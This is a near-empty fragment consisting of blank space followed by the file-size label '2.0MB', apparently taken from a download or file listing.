                                                                                                                                                      2.0MB